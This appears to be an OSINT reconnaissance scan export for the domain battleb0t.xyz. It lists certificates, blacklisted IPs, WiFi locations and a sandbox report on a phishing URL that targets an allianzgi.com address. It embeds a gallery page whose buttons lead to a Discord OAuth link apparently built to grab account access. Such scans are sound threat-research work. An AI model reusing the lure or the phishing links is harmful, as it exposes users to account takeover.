2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
24:54:79:6e:3c:79:d5:ae:a0:b8:7c:0a:ff:89:93:3d:d6:57:
91:5f:7d:e2:ea:b5:70:87:04:12:dd:cf:ba:db:1a:dd:bf:5f:
7c:c6:d9:18:6d:ca:27:ff:1c:41:bc:85:75:b0:f4:d1:5d:dc:
45:87:06:cb:1f:49:05:31:eb:49:05:f4:6b:36:41:2f:39:66:
bb:c1:2a:07:32:84:55:39:1c:a4:29:9c:55:fc:c5:e4:ad:62:
54:ad:d2:25:f2:67:4f:a1:c0:d0:75:ed:4f:e4:15:2f:b9:2f:
6f:67:f4:2e:dc:7e:0d:b9:75:12:29:49:c3:67:d0:7b:f2:21:
0c:ee:8a:58:d9:43:b2:12:a1:03:39:b0:0e:c1:ea:07:d2:2f:
a3:20:c3:66:05:93:88:53:7a:4d:dc:f9:b6:ec:64:81:b8:41:
97:de:f9:a9:49:80:7b:d7:0d:4d:f9:f4:92:96:1e:c7:cc:e3:
98:1b:07:be:b0:bf:bd:9e:e3:6c:c7:67:ae:92:9a:78:90:eb:
a0:3f:1e:59:bd:f5:c7:ec:43:04:a4:be:44:c3:74:12:39:82:
e0:e3:bf:d9:c2:3b:8e:9a:08:be:3c:f1:c4:88:72:a0:ed:59:
9a:b6:1a:ae:e9:2d:33:e0:ea:a0:55:60:b8:66:48:ca:d5:05:
c4:a4:9b:ca
|
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Clayton2 (Net ID: 00:02:2D:0E:A8:AC) | 37.7642, -122.3993 |
| 2023-05-12 02:53:25 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 172.67.168.252 | www.battleb0t.xyz |
| 2023-05-12 02:46:24 | Netblock Membership | No | RIPE | 8 | 0 | 2 | 0 | None | 185.199.109.0/24 | 185.199.109.153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom6F5C74 (Net ID: 00:0C:F6:6F:5C:74) | 50.8897, 6.0563 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:54:31) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EB:D2:2C) | 41.8781, -87.6298 |
| 2023-05-12 02:49:58 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.110.153]
https://www.virustotal.com/en/ip-address/185.199.110.153/information/ | 185.199.110.153 |
| 2023-05-12 02:54:48 | Physical Location | No | Censys | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29405, United States, North America | 34.148.97.127 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/login | login |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 3 | 0 | None | Honeypotproject (172.67.168.252): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 172.67.168.252 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.143): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:54:21) | 41.8781, -87.6298 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | themeforest (Category: art)
https://themeforest.net/user/ayhu | ayhu |
| 2023-05-12 02:44:20 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Dribbble (Category: art)
https://dribbble.com/login | login |
| 2023-05-12 02:53:06 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | nuke.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MyVolvoLpyPOa (Net ID: 00:10:02:39:B3:DE) | 32.8608, -79.9746 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Host": ["87.248.157.102:2080"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Horde DAV Server\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 02:53:35 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["872A:0A4B:BBF254:10FE511:645C54E0"], "Etag": ["W/\"64556a8c-239b\""], "Age": ["0"], "X_Cache_Hits": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache": ["MISS"], "X_Timer": ["S1683772640.067376,VS0,VE28"], "Connection": ["keep-alive"], "Via": ["1.1 varnish"], "X_Fastly_Request_Id": ["13b6057c2e99facbd081defdf7bc9d1ff579d6e4"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100052-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.110.153 |
| 2023-05-12 03:00:13 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | cpcontacts.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:54:20 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521 | http://nuke.battleb0t.xyz/ |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://use.fontawesome.com/9dfc16ed6b.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:A6:7E) | 41.8781, -87.6298 |
| 2023-05-12 03:00:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.12): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00089.github.io]
https://www.openphish.com/feed.txt | 00089.github.io |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 007316.xyz | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:aa:7b:81:42:e7:bb:ef:b8:0c:29:95:16:51:5f:
17:ef:12:01:ea:12:d1:38:f6:d6:ab:de:90:73:55:
a4:af:cb:7c:f7:08:2e:7f:ec:c7:d3:07:5d:b2:f5:
bb:41:e9:04:92:a8:3c:a4:cb:ef:73:55:b5:a9:bc:
5c:d1:be:26:4b:99:f3:8a:57:d8:c7:77:79:1d:0e:
70:31:81:bc:da:4a:73:41:e5:08:81:59:46:c7:d8:
68:74:56:c2:f6:64:23:af:1b:88:8f:72:bd:52:09:
2e:97:9b:f1:a4:cf:09:d8:89:91:91:ca:2e:06:41:
a2:84:ad:0d:6a:df:00:95:f5:ec:e2:1e:49:48:18:
0a:3f:98:fa:06:a5:50:9f:7c:2c:20:19:c1:55:cd:
77:d2:89:47:dd:a9:ee:13:f6:2f:e2:48:87:26:a5:
fd:85:17:06:37:b0:a9:d0:53:b4:4d:e3:4c:ec:0e:
83:60:b2:ad:ad:2d:44:08:30:33:b0:91:f7:b0:f8:
00:7f:d1:49:37:39:19:99:a3:59:5c:dc:4a:a0:c5:
bd:ef:ae:e1:d6:c3:40:3c:f6:35:0e:db:7b:df:4f:
54:c4:bd:f6:3a:2c:2b:ff:c9:5b:e5:d2:e9:69:24:
02:0b:f7:c6:94:a2:a1:ed:73:64:15:f9:25:08:00:
3b:85
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E7:35:7E:35:FD:7B:BC:32:B5:C0:52:8C:76:D9:7D:F0:37:0A:7A:3D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/X4UdJFi-bqE
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QCTFvWRh6mE.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:9f:cd:b5:43:3b:6a:2f:1d:c9:3b:c0:c8:50:40:4b:85:6c:
a4:67:c0:ea:9c:ed:fa:82:03:5a:15:d9:da:e2:17:9e:f5:4d:
17:b3:27:61:b6:b3:76:a2:5c:3c:dc:1f:ca:d1:cf:2a:8c:c5:
9f:e1:42:b1:ce:4f:6c:8b:d7:5b:5d:4a:1a:37:bf:f7:48:1c:
b0:1e:50:fd:1f:d7:83:b8:62:23:8e:ce:bc:13:38:47:cd:3d:
85:a8:0c:e6:2b:35:45:86:97:06:88:96:8f:aa:84:6c:ae:91:
25:1d:3c:c7:d6:f8:a1:4f:51:5e:ed:a9:fe:6b:22:98:84:a4:
ef:b4:d3:2f:02:db:9e:b8:fb:29:cc:58:62:ad:6f:ac:48:dc:
16:46:0c:14:b4:34:7b:60:f1:ec:27:16:2b:4e:4a:c3:37:36:
d0:34:81:c1:2b:54:8c:d5:17:57:ba:55:4c:71:58:26:4f:c6:
22:b8:65:ba:ad:e7:f5:f2:a8:04:c1:7d:df:11:ab:7d:f5:94:
7d:56:64:8a:41:7f:f4:d3:d7:1a:a0:c6:cc:e6:42:c8:ac:de:
6a:33:c1:21:70:bc:bd:6f:69:08:1f:8f:fa:9f:b7:aa:ca:2e:
e6:b7:8f:15:ac:fb:89:0e:c0:5f:c0:b9:df:e8:c0:15:b9:87:
ca:00:58:c5
| battleb0t.xyz |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Seattle, Washington, 98108, United States, North America |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abc@allianzgi.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_330_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_330_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_330_ConnHashTable<816>_HashTable_Mutex"\n "IsoScope_330_IE_EarlyTabStart_0x690_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_330_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_816"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.43.150:443"\n "185.88.152.184:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "TarBB6A.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBA30.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBA1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabBB69.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "TarBB6A.tmp" has type "data"- Location: [%TEMP%\\TarBB6A.tmp]- [targetUID: 00000000-00002892]\n "_9E69994D-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002892]\n "~DF41FFD31729A203FF.TMP" has type "data"- Location: [%TEMP%\\~DF41FFD31729A203FF.TMP]- [targetUID: 00000000-00000816]\n "RecoveryStore._9E69994B-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "6JGINI9K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JGINI9K.txt]- [targetUID: 00000000-00000816]\n "J0N78Y0C.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0N78Y0C.txt]- [targetUID: 00000000-00000816]\n "CabBA1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBA1F.tmp]- [targetUID: 00000000-00002892]\n "S35ZJMPU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S35ZJMPU.txt]- [targetUID: 00000000-00000816]\n "MYW52O1X.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\MYW52O1X.htm]- [targetUID: 00000000-00002892]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "CabBB69.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBB69.tmp]- [targetUID: 00000000-00002892]\n "_A7F3014A-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF51E1B1269B03A86.TMP" has type "data"- Location: [%TEMP%\\~DFF51E1B1269B03A86.TMP]- [targetUID: 00000000-00000816]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "MUID1C5CECAFE62F66650020FE60E76367DFmsn.com/1025229670643231098083270159623031019620*"\n Heuristic match: "api.salesflare.com"\n Pattern 